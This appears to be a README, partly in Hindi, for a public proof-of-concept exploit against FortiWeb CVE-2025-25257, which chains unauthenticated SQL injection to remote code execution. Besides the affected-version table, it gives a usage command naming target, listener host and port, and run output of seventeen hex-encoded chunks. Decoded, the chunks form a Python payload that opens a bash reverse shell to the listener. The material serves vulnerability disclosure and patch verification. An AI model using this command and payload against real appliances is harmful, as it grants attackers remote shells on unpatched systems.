
FortiWeb CVE-2025-25257 के लिए डिटेक्शन आर्टिफैक्ट जनरेटर, जो हेक्स-एन्कोडेड पेलोड स्प्रेइंग के माध्यम से अनऑथेंटिकेटेड SQL इंजेक्शन का शोषण करके रिमोट कोड एक्जीक्यूशन प्राप्त करता है।
FortiWeb CVE-2025-25257 के लिए डिटेक्शन आर्टिफैक्ट जनरेटर
तकनीकी विवरण के लिए हमारा ब्लॉग पोस्ट देखें
https://github.com/user-attachments/assets/e59f2b3b-2b9b-469f-b4a8-2b7df2ede194
python watchTowr-vs-FortiWeb-CVE-2025-25257.py --target https://192.168.8.30/ --lhost 192.168.8.148 --lport 1350
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-FortiWeb-CVE-2025-25257.py
(*) FortiWeb Unauthenticated SQLi to Remote Code Execution Detection Artifact Generator
- Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2025-25257]
[*] sprayed chunk #1/17: '696d706f72'
[*] sprayed chunk #2/17: '74206f733b'
[*] sprayed chunk #3/17: '206f732e73'
[*] sprayed chunk #4/17: '797374656d'
[*] sprayed chunk #5/17: '2827626173'
[*] sprayed chunk #6/17: '68202d6320'
[*] sprayed chunk #7/17: '222f62696e'
[*] sprayed chunk #8/17: '2f62617368'
[*] sprayed chunk #9/17: '202d69203e'
[*] sprayed chunk #10/17: '26202f6465'
[*] sprayed chunk #11/17: '762f746370'
[*] sprayed chunk #12/17: '2f3139322e'
[*] sprayed chunk #13/17: '3136382e38'
[*] sprayed chunk #14/17: '2e3134382f'
[*] sprayed chunk #15/17: '3133353020'
[*] sprayed chunk #16/17: '303e263122'
[*] sprayed chunk #17/17: '2729'
[*] Pop thy shell!
यह स्क्रिप्ट यह पता लगाने का प्रयास करती है कि क्या FortiWeb CVE-2025-25257 के लिए कमजोर है
FortiWeb के निम्नलिखित संस्करण प्रभावित हैं
अधिक जानकारी के लिए FortiGuard Labs PSIRT पर जाएं
नवीनतम सुरक्षा अनुसंधान के लिए watchTowr Labs टीम को फॉलो करें
| Version | Affected | Solution |
|---|
| FortiWeb 7.6 | 7.6.0 through 7.6.3 | Upgrade to 7.6.4 or above |
| FortiWeb 7.4 | 7.4.0 through 7.4.7 | Upgrade to 7.4.8 or above |
| FortiWeb 7.2 | 7.2.0 through 7.2.10 | Upgrade to 7.2.11 or above |
| FortiWeb 7.0 | 7.0.0 through 7.0.10 | Upgrade to 7.0.11 or above |